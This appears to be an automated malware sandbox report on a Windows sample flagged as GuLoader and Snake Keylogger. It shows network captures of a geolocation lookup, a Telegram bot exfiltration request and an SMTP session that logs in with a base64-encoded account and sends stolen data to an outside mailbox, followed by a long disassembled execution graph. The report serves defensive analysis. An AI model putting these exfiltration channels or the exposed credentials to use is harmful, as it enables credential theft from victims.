                                                                                                                                                2024-11-12 06:37:01 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.849729188.114.97.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:37:03 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-12 06:37:03 UTC864INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:37:03 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14646
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdc9%2Ba6kKKclbK5%2Bv8zpl6YdN40LTmDw%2FvSg9KzhNNeczV85Hh%2FJ4CRkIJi%2FTgZQBBBn%2FqyIju0MtZ8p5uxvA9H%2BGOqMD89H%2Bbiwo%2BP0zLBpSdWlxPednmwPzq%2FxPgbaiWIyt8YV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e1482e05ee96c3d-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2006&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1428007&cwnd=239&unsent_bytes=0&cid=52f1a5f7ba0cb1c6&ts=147&x=0"
                                                                                                                                                2024-11-12 06:37:03 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.849730149.154.167.2204435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:37:04 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2012/11/2024%20/%2018:46:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                Host: api.telegram.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-12 06:37:04 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Tue, 12 Nov 2024 06:37:04 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 55
                                                                                                                                                Connection: close
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                2024-11-12 06:37:04 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                Nov 12, 2024 07:37:11.544866085 CET5874973137.27.123.72192.168.2.8220-server42.hndservers.net ESMTP Exim 4.98 #2 Tue, 12 Nov 2024 11:37:11 +0500
                                                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                220 and/or bulk e-mail.
                                                                                                                                                Nov 12, 2024 07:37:11.545109987 CET49731587192.168.2.837.27.123.72EHLO 141700
                                                                                                                                                Nov 12, 2024 07:37:11.808736086 CET5874973137.27.123.72192.168.2.8250-server42.hndservers.net Hello 141700 [173.254.250.68]
                                                                                                                                                250-SIZE 104857600
                                                                                                                                                250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                                                                                250-8BITMIME
                                                                                                                                                250-PIPELINING
                                                                                                                                                250-PIPECONNECT
                                                                                                                                                250-AUTH PLAIN LOGIN
                                                                                                                                                250-STARTTLS
                                                                                                                                                250 HELP
                                                                                                                                                Nov 12, 2024 07:37:11.809822083 CET49731587192.168.2.837.27.123.72AUTH login d2FqYWhhdEBmb29kZXguY29tLnBr
                                                                                                                                                Nov 12, 2024 07:37:12.073113918 CET5874973137.27.123.72192.168.2.8334 UGFzc3dvcmQ6
                                                                                                                                                Nov 12, 2024 07:37:12.386077881 CET5874973137.27.123.72192.168.2.8235 Authentication succeeded
                                                                                                                                                Nov 12, 2024 07:37:12.386405945 CET49731587192.168.2.837.27.123.72MAIL FROM:<wajahat@foodex.com.pk>
                                                                                                                                                Nov 12, 2024 07:37:12.651034117 CET5874973137.27.123.72192.168.2.8250 OK
                                                                                                                                                Nov 12, 2024 07:37:12.651307106 CET49731587192.168.2.837.27.123.72RCPT TO:<millions1000@proton.me>
                                                                                                                                                Nov 12, 2024 07:37:12.938110113 CET5874973137.27.123.72192.168.2.8250 Accepted
                                                                                                                                                Nov 12, 2024 07:37:12.938277006 CET49731587192.168.2.837.27.123.72DATA
                                                                                                                                                Nov 12, 2024 07:37:13.201390982 CET5874973137.27.123.72192.168.2.8354 Enter message, ending with "." on a line by itself
                                                                                                                                                Nov 12, 2024 07:37:13.202430010 CET49731587192.168.2.837.27.123.72.
                                                                                                                                                Nov 12, 2024 07:37:13.806675911 CET5874973137.27.123.72192.168.2.8250 OK id=1tAkWX-0000000EDpY-12X2
                                                                                                                                                Nov 12, 2024 07:38:50.484103918 CET49731587192.168.2.837.27.123.72QUIT
                                                                                                                                                Nov 12, 2024 07:38:50.947993040 CET5874973137.27.123.72192.168.2.8221 server42.hndservers.net closing connection

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Click to jump to process

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:01:36:16
                                                                                                                                                Start date:12/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\________.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\________.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:847'584 bytes
                                                                                                                                                MD5 hash:89B3B4723EA3983FC0F103EAF3093EDC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1623677806.000000000330D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:01:36:30
                                                                                                                                                Start date:12/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\________.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\________.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:847'584 bytes
                                                                                                                                                MD5 hash:89B3B4723EA3983FC0F103EAF3093EDC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:19.5%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:15.2%
                                                                                                                                                  Signature Coverage:19%
                                                                                                                                                  Total number of Nodes:1504
                                                                                                                                                  Total number of Limit Nodes:46
                                                                                                                                                  execution_graph 4975 10001000 4978 1000101b 4975->4978 4985 1000152e 4978->4985 4980 10001020 4981 10001024 4980->4981 4982 10001027 GlobalAlloc 4980->4982 4983 10001555 3 API calls 4981->4983 4982->4981 4984 10001019 4983->4984 4986 10001243 3 API calls 4985->4986 4987 10001534 4986->4987 4988 1000153a 4987->4988 4989 10001546 GlobalFree 4987->4989 4988->4980 4989->4980 4990 401d41 GetDC GetDeviceCaps 4991 402b1d 18 API calls 4990->4991 4992 401d5f MulDiv ReleaseDC 4991->4992 4993 402b1d 18 API calls 4992->4993 4994 401d7e 4993->4994 4995 405f0c 18 API calls 4994->4995 4996 401db7 CreateFontIndirectW 4995->4996 4997 4024e8 4996->4997 4998 401a42 4999 402b1d 18 API calls 4998->4999 5000 401a48 4999->5000 5001 402b1d 18 API calls 5000->5001 5002 4019f0 5001->5002 5003 404243 lstrcpynW lstrlenW 5004 402746 5005 402741 5004->5005 5005->5004 5006 402756 FindNextFileW 5005->5006 5007 4027a8 5006->5007 5009 402761 5006->5009 5010 405eea lstrcpynW 5007->5010 5010->5009 5011 401cc6 5012 402b1d 18 API calls 5011->5012 5013 401cd9 SetWindowLongW 5012->5013 5014 4029c7 5013->5014 5022 4045ca 5023 4045f6 5022->5023 5024 404607 5022->5024 5083 4056aa GetDlgItemTextW 5023->5083 5026 404613 GetDlgItem 5024->5026 5059 404672 5024->5059 5029 404627 5026->5029 5027 404756 5031 4048f7 5027->5031 5085 4056aa GetDlgItemTextW 5027->5085 5028 404601 5030 40617e 5 API calls 5028->5030 5033 40463b SetWindowTextW 5029->5033 5034 4059e0 4 API calls 5029->5034 5030->5024 5038 404196 8 API calls 5031->5038 5037 40412f 19 API calls 5033->5037 5039 404631 5034->5039 5035 405f0c 18 API calls 5040 4046e6 SHBrowseForFolderW 5035->5040 5036 404786 5041 405a3d 18 API calls 5036->5041 5042 404657 5037->5042 5043 40490b 5038->5043 5039->5033 5047 405935 3 API calls 5039->5047 5040->5027 5044 4046fe CoTaskMemFree 5040->5044 5045 40478c 5041->5045 5046 40412f 19 API calls 5042->5046 5048 405935 3 API calls 5044->5048 5086 405eea lstrcpynW 5045->5086 5049 404665 5046->5049 5047->5033 5050 40470b 5048->5050 5084 404164 SendMessageW 5049->5084 5053 404742 SetDlgItemTextW 5050->5053 5058 405f0c 18 API calls 5050->5058 5053->5027 5054 40466b 5056 406254 3 API calls 5054->5056 5055 4047a3 5057 406254 3 API calls 5055->5057 5056->5059 5065 4047ab 5057->5065 5060 40472a lstrcmpiW 5058->5060 5059->5027 5059->5031 5059->5035 5060->5053 5063 40473b lstrcatW 5060->5063 5061 4047ea 5087 405eea lstrcpynW 5061->5087 5063->5053 5064 4047f1 5066 4059e0 4 API calls 5064->5066 5065->5061 5069 405981 2 API calls 5065->5069 5071 40483c 5065->5071 5067 4047f7 GetDiskFreeSpaceW 5066->5067 5070 40481a MulDiv 5067->5070 5067->5071 5069->5065 5070->5071 5072 4048a6 5071->5072 5074 404978 21 API calls 5071->5074 5073 4048c9 5072->5073 5075 40140b 2 API calls 5072->5075 5088 404151 EnableWindow 5073->5088 5076 404898 5074->5076 5075->5073 5078 4048a8 SetDlgItemTextW 5076->5078 5079 40489d 5076->5079 5078->5072 5081 404978 21 API calls 5079->5081 5080 4048e5 5080->5031 5089 40455f 5080->5089 5081->5072 5083->5028 5084->5054 5085->5036 5086->5055 5087->5064 5088->5080 5090 404572 SendMessageW 5089->5090 5091 40456d 5089->5091 5090->5031 5091->5090 5092 401bca 5093 402b1d 18 API calls 5092->5093 5094 401bd1 5093->5094 5095 402b1d 18 API calls 5094->5095 5096 401bdb 5095->5096 5097 401beb 5096->5097 5098 402b3a 18 API calls 5096->5098 5099 401bfb 5097->5099 5100 402b3a 18 API calls 5097->5100 5098->5097 5101 401c06 5099->5101 5102 401c4a 5099->5102 5100->5099 5104 402b1d 18 API calls 5101->5104 5103 402b3a 18 API calls 5102->5103 5105 401c4f 5103->5105 5106 401c0b 5104->5106 5107 402b3a 18 API calls 5105->5107 5108 402b1d 18 API calls 5106->5108 5110 401c58 FindWindowExW 5107->5110 5109 401c14 5108->5109 5111 401c3a SendMessageW 5109->5111 5112 401c1c SendMessageTimeoutW 5109->5112 5113 401c7a 5110->5113 5111->5113 5112->5113 5114 40194b 5115 402b1d 18 API calls 5114->5115 5116 401952 5115->5116 5117 402b1d 18 API calls 5116->5117 5118 40195c 5117->5118 5119 402b3a 18 API calls 5118->5119 5120 401965 5119->5120 5121 401979 lstrlenW 5120->5121 5122 4019b5 5120->5122 5123 401983 5121->5123 5123->5122 5127 405eea lstrcpynW 5123->5127 5125 40199e 5125->5122 5126 4019ab lstrlenW 5125->5126 5126->5122 5127->5125 5131 4042cc 5133 4043fe 5131->5133 5134 4042e4 5131->5134 5132 404468 5135 404472 GetDlgItem 5132->5135 5136 40453a 5132->5136 5133->5132 5133->5136 5140 404439 GetDlgItem SendMessageW 5133->5140 5137 40412f 19 API calls 5134->5137 5138 4044fb 5135->5138 5139 40448c 5135->5139 5142 404196 8 API calls 5136->5142 5141 40434b 5137->5141 5138->5136 5143 40450d 5138->5143 5139->5138 5147 4044b2 6 API calls 5139->5147 5162 404151 EnableWindow 5140->5162 5145 40412f 19 API calls 5141->5145 5146 404535 5142->5146 5148 404523 5143->5148 5149 404513 SendMessageW 5143->5149 5151 404358 CheckDlgButton 5145->5151 5147->5138 5148->5146 5152 404529 SendMessageW 5148->5152 5149->5148 5150 404463 5153 40455f SendMessageW 5150->5153 5160 404151 EnableWindow 5151->5160 5152->5146 5153->5132 5155 404376 GetDlgItem 5161 404164 SendMessageW 5155->5161 5157 40438c SendMessageW 5158 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5157->5158 5159 4043a9 GetSysColor 5157->5159 5158->5146 5159->5158 5160->5155 5161->5157 5162->5150 5163 4024cc 5164 402b3a 18 API calls 5163->5164 5165 4024d3 5164->5165 5168 405b56 GetFileAttributesW CreateFileW 5165->5168 5167 4024df 5168->5167 4174 1000278d 4175 100027dd 4174->4175 4176 1000279d VirtualProtect 4174->4176 4176->4175 5169 4019cf 5170 402b3a 18 API calls 5169->5170 5171 4019d6 5170->5171 5172 402b3a 18 API calls 5171->5172 5173 4019df 5172->5173 5174 4019e6 lstrcmpiW 5173->5174 5175 4019f8 lstrcmpW 5173->5175 5176 4019ec 5174->5176 5175->5176 4260 401e51 4261 402b3a 18 API calls 4260->4261 4262 401e57 4261->4262 4263 405194 25 API calls 4262->4263 4264 401e61 4263->4264 4278 405665 CreateProcessW 4264->4278 4267 401ec6 CloseHandle 4271 402793 4267->4271 4268 401e77 WaitForSingleObject 4269 401e89 4268->4269 4270 401e9b GetExitCodeProcess 4269->4270 4281 40628d 4269->4281 4272 401eba 4270->4272 4273 401ead 4270->4273 4272->4267 4276 401eb8 4272->4276 4285 405e31 wsprintfW 4273->4285 4276->4267 4279 401e67 4278->4279 4280 405694 CloseHandle 4278->4280 4279->4267 4279->4268 4279->4271 4280->4279 4282 4062aa PeekMessageW 4281->4282 4283 4062a0 DispatchMessageW 4282->4283 4284 401e90 WaitForSingleObject 4282->4284 4283->4282 4284->4269 4285->4276 4363 401752 4364 402b3a 18 API calls 4363->4364 4365 401759 4364->4365 4366 401781 4365->4366 4367 401779 4365->4367 4403 405eea lstrcpynW 4366->4403 4402 405eea lstrcpynW 4367->4402 4370 40177f 4374 40617e 5 API calls 4370->4374 4371 40178c 4372 405935 3 API calls 4371->4372 4373 401792 lstrcatW 4372->4373 4373->4370 4391 40179e 4374->4391 4375 40622d 2 API calls 4375->4391 4376 405b31 2 API calls 4376->4391 4378 4017b0 CompareFileTime 4378->4391 4379 401870 4381 405194 25 API calls 4379->4381 4380 401847 4382 405194 25 API calls 4380->4382 4400 40185c 4380->4400 4384 40187a 4381->4384 4382->4400 4383 405eea lstrcpynW 4383->4391 4385 403062 46 API calls 4384->4385 4386 40188d 4385->4386 4387 4018a1 SetFileTime 4386->4387 4388 4018b3 CloseHandle 4386->4388 4387->4388 4390 4018c4 4388->4390 4388->4400 4389 405f0c 18 API calls 4389->4391 4392 4018c9 4390->4392 4393 4018dc 4390->4393 4391->4375 4391->4376 4391->4378 4391->4379 4391->4380 4391->4383 4391->4389 4396 4056c6 MessageBoxIndirectW 4391->4396 4401 405b56 GetFileAttributesW CreateFileW 4391->4401 4394 405f0c 18 API calls 4392->4394 4395 405f0c 18 API calls 4393->4395 4397 4018d1 lstrcatW 4394->4397 4398 4018e4 4395->4398 4396->4391 4397->4398 4399 4056c6 MessageBoxIndirectW 4398->4399 4399->4400 4401->4391 4402->4370 4403->4371 4404 402253 4405 402261 4404->4405 4406 40225b 4404->4406 4407 40226f 4405->4407 4409 402b3a 18 API calls 4405->4409 4408 402b3a 18 API calls 4406->4408 4410 402b3a 18 API calls 4407->4410 4412 40227d 4407->4412 4408->4405 4409->4407 4410->4412 4411 402b3a 18 API calls 4413 402286 WritePrivateProfileStringW 4411->4413 4412->4411 5177 4052d3 5178 4052f4 GetDlgItem GetDlgItem GetDlgItem 5177->5178 5179 40547f 5177->5179 5222 404164 SendMessageW 5178->5222 5180 4054b0 5179->5180 5181 405488 GetDlgItem CreateThread CloseHandle 5179->5181 5184 4054db 5180->5184 5185 405500 5180->5185 5186 4054c7 ShowWindow ShowWindow 5180->5186 5181->5180 5183 405365 5188 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5183->5188 5187 40553b 5184->5187 5190 405515 ShowWindow 5184->5190 5191 4054ef 5184->5191 5192 404196 8 API calls 5185->5192 5224 404164 SendMessageW 5186->5224 5187->5185 5195 405549 SendMessageW 5187->5195 5193 4053db 5188->5193 5194 4053bf SendMessageW SendMessageW 5188->5194 5197 405535 5190->5197 5198 405527 5190->5198 5196 404108 SendMessageW 5191->5196 5203 40550e 5192->5203 5200 4053e0 SendMessageW 5193->5200 5201 4053ee 5193->5201 5194->5193 5202 405562 CreatePopupMenu 5195->5202 5195->5203 5196->5185 5199 404108 SendMessageW 5197->5199 5204 405194 25 API calls 5198->5204 5199->5187 5200->5201 5206 40412f 19 API calls 5201->5206 5205 405f0c 18 API calls 5202->5205 5204->5197 5207 405572 AppendMenuW 5205->5207 5208 4053fe 5206->5208 5209 4055a2 TrackPopupMenu 5207->5209 5210 40558f GetWindowRect 5207->5210 5211 405407 ShowWindow 5208->5211 5212 40543b GetDlgItem SendMessageW 5208->5212 5209->5203 5213 4055bd 5209->5213 5210->5209 5214 40542a 5211->5214 5215 40541d ShowWindow 5211->5215 5212->5203 5216 405462 SendMessageW SendMessageW 5212->5216 5217 4055d9 SendMessageW 5213->5217 5223 404164 SendMessageW 5214->5223 5215->5214 5216->5203 5217->5217 5218 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5217->5218 5220 40561b SendMessageW 5218->5220 5220->5220 5221 405644 GlobalUnlock SetClipboardData CloseClipboard 5220->5221 5221->5203 5222->5183 5223->5212 5224->5184 4414 402454 4415 402c44 19 API calls 4414->4415 4416 40245e 4415->4416 4417 402b1d 18 API calls 4416->4417 4418 402467 4417->4418 4419 402793 4418->4419 4420 40248b RegEnumValueW 4418->4420 4421 40247f RegEnumKeyW 4418->4421 4420->4419 4422 4024a4 RegCloseKey 4420->4422 4421->4422 4422->4419 5225 401ed4 5226 402b3a 18 API calls 5225->5226 5227 401edb 5226->5227 5228 40622d 2 API calls 5227->5228 5229 401ee1 5228->5229 5231 401ef2 5229->5231 5232 405e31 wsprintfW 5229->5232 5232->5231 4424 4022d5 4425 402305 4424->4425 4426 4022da 4424->4426 4427 402b3a 18 API calls 4425->4427 4428 402c44 19 API calls 4426->4428 4429 40230c 4427->4429 4430 4022e1 4428->4430 4437 402b7a RegOpenKeyExW 4429->4437 4431 4022eb 4430->4431 4436 402324 4430->4436 4432 402b3a 18 API calls 4431->4432 4433 4022f2 RegDeleteValueW RegCloseKey 4432->4433 4433->4436 4443 402ba5 4437->4443 4446 402322 4437->4446 4438 402bcb RegEnumKeyW 4439 402bdd RegCloseKey 4438->4439 4438->4443 4441 406254 3 API calls 4439->4441 4440 402c02 RegCloseKey 4440->4446 4444 402bed 4441->4444 4442 402b7a 3 API calls 4442->4443 4443->4438 4443->4439 4443->4440 4443->4442 4445 402c1d RegDeleteKeyW 4444->4445 4444->4446 4445->4446 4446->4436 4454 403c57 4455 403daa 4454->4455 4456 403c6f 4454->4456 4458 403dfb 4455->4458 4459 403dbb GetDlgItem GetDlgItem 4455->4459 4456->4455 4457 403c7b 4456->4457 4460 403c86 SetWindowPos 4457->4460 4461 403c99 4457->4461 4463 403e55 4458->4463 4468 401389 2 API calls 4458->4468 4462 40412f 19 API calls 4459->4462 4460->4461 4465 403cb6 4461->4465 4466 403c9e ShowWindow 4461->4466 4467 403de5 SetClassLongW 4462->4467 4464 40417b SendMessageW 4463->4464 4486 403da5 4463->4486 4493 403e67 4464->4493 4469 403cd8 4465->4469 4470 403cbe DestroyWindow 4465->4470 4466->4465 4471 40140b 2 API calls 4467->4471 4472 403e2d 4468->4472 4474 403cdd SetWindowLongW 4469->4474 4475 403cee 4469->4475 4473 4040d9 4470->4473 4471->4458 4472->4463 4478 403e31 SendMessageW 4472->4478 4484 4040e9 ShowWindow 4473->4484 4473->4486 4474->4486 4476 403d97 4475->4476 4477 403cfa GetDlgItem 4475->4477 4483 404196 8 API calls 4476->4483 4481 403d2a 4477->4481 4482 403d0d SendMessageW IsWindowEnabled 4477->4482 4478->4486 4479 40140b 2 API calls 4479->4493 4480 4040ba DestroyWindow EndDialog 4480->4473 4485 403d2f 4481->4485 4488 403d37 4481->4488 4489 403d7e SendMessageW 4481->4489 4490 403d4a 4481->4490 4482->4481 4482->4486 4483->4486 4484->4486 4528 404108 4485->4528 4487 405f0c 18 API calls 4487->4493 4488->4485 4488->4489 4489->4476 4494 403d52 4490->4494 4495 403d67 4490->4495 4492 40412f 19 API calls 4492->4493 4493->4479 4493->4480 4493->4486 4493->4487 4493->4492 4500 40412f 19 API calls 4493->4500 4515 403ffa DestroyWindow 4493->4515 4498 40140b 2 API calls 4494->4498 4497 40140b 2 API calls 4495->4497 4496 403d65 4496->4476 4499 403d6e 4497->4499 4498->4485 4499->4476 4499->4485 4501 403ee2 GetDlgItem 4500->4501 4502 403ef7 4501->4502 4503 403eff ShowWindow KiUserCallbackDispatcher 4501->4503 4502->4503 4525 404151 EnableWindow 4503->4525 4505 403f29 EnableWindow 4508 403f3d 4505->4508 4506 403f42 GetSystemMenu EnableMenuItem SendMessageW 4507 403f72 SendMessageW 4506->4507 4506->4508 4507->4508 4508->4506 4526 404164 SendMessageW 4508->4526 4527 405eea lstrcpynW 4508->4527 4511 403fa0 lstrlenW 4512 405f0c 18 API calls 4511->4512 4513 403fb6 SetWindowTextW 4512->4513 4514 401389 2 API calls 4513->4514 4514->4493 4515->4473 4516 404014 CreateDialogParamW 4515->4516 4516->4473 4517 404047 4516->4517 4518 40412f 19 API calls 4517->4518 4519 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4518->4519 4520 401389 2 API calls 4519->4520 4521 404098 4520->4521 4521->4486 4522 4040a0 ShowWindow 4521->4522 4523 40417b SendMessageW 4522->4523 4524 4040b8 4523->4524 4524->4473 4525->4505 4526->4508 4527->4511 4529 404115 SendMessageW 4528->4529 4530 40410f 4528->4530 4529->4496 4530->4529 4531 4014d7 4532 402b1d 18 API calls 4531->4532 4533 4014dd Sleep 4532->4533 4535 4029c7 4533->4535 4752 40335a #17 SetErrorMode OleInitialize 4753 406254 3 API calls 4752->4753 4754 40339d SHGetFileInfoW 4753->4754 4825 405eea lstrcpynW 4754->4825 4756 4033c8 GetCommandLineW 4826 405eea lstrcpynW 4756->4826 4758 4033da GetModuleHandleW 4759 4033f2 4758->4759 4760 405962 CharNextW 4759->4760 4761 403401 CharNextW 4760->4761 4769 403411 4761->4769 4762 4034e6 4763 4034fa GetTempPathW 4762->4763 4827 403326 4763->4827 4765 403512 4766 403516 GetWindowsDirectoryW lstrcatW 4765->4766 4767 40356c DeleteFileW 4765->4767 4770 403326 11 API calls 4766->4770 4835 402dbc GetTickCount GetModuleFileNameW 4767->4835 4768 405962 CharNextW 4768->4769 4769->4762 4769->4768 4775 4034e8 4769->4775 4772 403532 4770->4772 4772->4767 4774 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4772->4774 4773 403580 4776 403618 4773->4776 4779 403608 4773->4779 4783 405962 CharNextW 4773->4783 4778 403326 11 API calls 4774->4778 4919 405eea lstrcpynW 4775->4919 4922 4037c2 4776->4922 4782 403564 4778->4782 4865 4038b4 4779->4865 4782->4767 4782->4776 4787 40359b 4783->4787 4785 403631 4788 4056c6 MessageBoxIndirectW 4785->4788 4786 403727 4789 4037aa ExitProcess 4786->4789 4794 406254 3 API calls 4786->4794 4792 4035e2 4787->4792 4793 403647 lstrcatW lstrcmpiW 4787->4793 4791 40363f ExitProcess 4788->4791 4795 405a3d 18 API calls 4792->4795 4793->4776 4796 403663 CreateDirectoryW SetCurrentDirectoryW 4793->4796 4797 403736 4794->4797 4799 4035ee 4795->4799 4800 403686 4796->4800 4801 40367b 4796->4801 4798 406254 3 API calls 4797->4798 4802 40373f 4798->4802 4799->4776 4920 405eea lstrcpynW 4799->4920 4932 405eea lstrcpynW 4800->4932 4931 405eea lstrcpynW 4801->4931 4805 406254 3 API calls 4802->4805 4807 403748 4805->4807 4809 403796 ExitWindowsEx 4807->4809 4814 403756 GetCurrentProcess 4807->4814 4808 4035fd 4921 405eea lstrcpynW 4808->4921 4809->4789 4812 4037a3 4809->4812 4811 405f0c 18 API calls 4813 4036c5 DeleteFileW 4811->4813 4815 40140b 2 API calls 4812->4815 4816 4036d2 CopyFileW 4813->4816 4822 403694 4813->4822 4819 403766 4814->4819 4815->4789 4816->4822 4817 40371b 4820 405d84 40 API calls 4817->4820 4818 405d84 40 API calls 4818->4822 4819->4809 4820->4776 4821 405f0c 18 API calls 4821->4822 4822->4811 4822->4817 4822->4818 4822->4821 4823 405665 2 API calls 4822->4823 4824 403706 CloseHandle 4822->4824 4823->4822 4824->4822 4825->4756 4826->4758 4828 40617e 5 API calls 